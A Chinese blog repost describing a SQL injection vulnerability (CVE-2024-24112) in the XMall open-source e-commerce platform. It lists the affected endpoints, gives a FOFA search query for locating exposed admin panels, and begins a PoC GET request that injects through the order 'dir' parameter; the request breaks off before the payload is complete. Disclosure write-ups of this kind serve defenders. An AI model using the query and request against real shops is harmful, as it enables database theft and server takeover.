热门标签
热门文章
- 1用VS Code配置Python开发环境(最简便的步骤教程)_vscode配置python环境
- 2如何使用python构建一棵Trie树,并基于graphviz绘制Trie树_python rtl tree
- 3RecyclerView详解_getspancount
- 4Android 12 预览版带给我们的1234,android直播面试题_warning: adb backup is deprecated and may be remov
- 5百词斩一面9.17
- 6阿里云u1服务器通用算力型CPU处理器性能测评_算力可以按照vcpu计算
- 7麒麟系统开发笔记(一):国产麒麟系统搭建开发环境之虚拟机安装_麒麟系统虚拟机
- 8vue-pdf 操作_@lanseria/vue-pdf-vite
- 9为什么程序员下班从来不关电脑?_下班不关电脑
- 10LeetCode 69. x 的平方根_leetcode 69. x 的平方根 c++
当前位置: article > 正文
XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)_exrick xmall 开源商城 sql注入漏洞
作者:羊村懒王 | 2024-02-28 11:06:00
赞
踩
exrick xmall 开源商城 sql注入漏洞
0x01 产品简介
XMall 开源电商商城 是开发者Exrick的一款基于SOA架构的分布式电商购物商城 前后端分离 前台商城:Vue全家桶 后台管理:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等。
0x02 漏洞概述
XMall 开源商城 /item/list、/item/listSearch、/sys/log、/order/list、/member/list 、/member/list/remove等多处接口存在SQL注入漏洞,未经身份验证的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x03 影响范围
| xmall |
1.1版本 |
0x04 复现环境
FOFA:app="XMall-后台管理系统"
0x05 漏洞复现
PoC
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=d声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/158604?site
推荐阅读
相关标签
